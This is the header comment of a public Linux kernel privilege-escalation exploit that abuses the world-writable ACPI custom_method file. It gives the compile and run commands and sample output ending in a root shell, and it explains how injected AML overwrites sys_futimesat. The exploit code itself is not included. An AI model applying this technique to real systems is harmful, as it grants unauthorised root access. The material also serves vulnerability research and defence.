Linux Kernel 2.6.37-rc2 ACPI Privilege Escalation

* american-sign-language.c
* Linux Kernel <>
* Jon Oberheide
* Information:
* This custom_method file allows to inject custom ACPI methods into the ACPI
* interpreter tables. This control file was introduced with world writeable
* permissions in Linux Kernel 2.6.33.
* Usage:
* $ gcc american-sign-language.c -o american-sign-language
* $ ./american-sign-language
* [+] resolving required symbols...
* [+] checking for world-writable custom_method...
* [+] checking for an ACPI LID device...
* [+] poisoning ACPI tables via custom_method...
* [+] triggering ACPI payload via LID device...
* [+] triggering exploit via futimesat...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root) groups=0(root)
* Notes:
* This vuln allows us to write custom ACPI methods and load them into the
* kernel as an unprivileged user. We compile some fancy ASL down to AML
* that overrides the ACPI method used when the status of the LID device is
* queried (eg. 'open' or 'closed' lid on a laptop). When the method is
* triggered, it overlays an OperationRegion on the physical address where
* sys_futimesat is located and overwrites the memory via the Store to
* escalate privileges whenever sys_futimesat is called.
* The payload is 64-bit only and depends on the existence of a LID device
* (eg. laptop), but the exploit will still tell you if you're vulnerable
* regardless. If you don't know how to work around these limitations, you
* probably shouldn't be running this in the first place. :-P
* Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants


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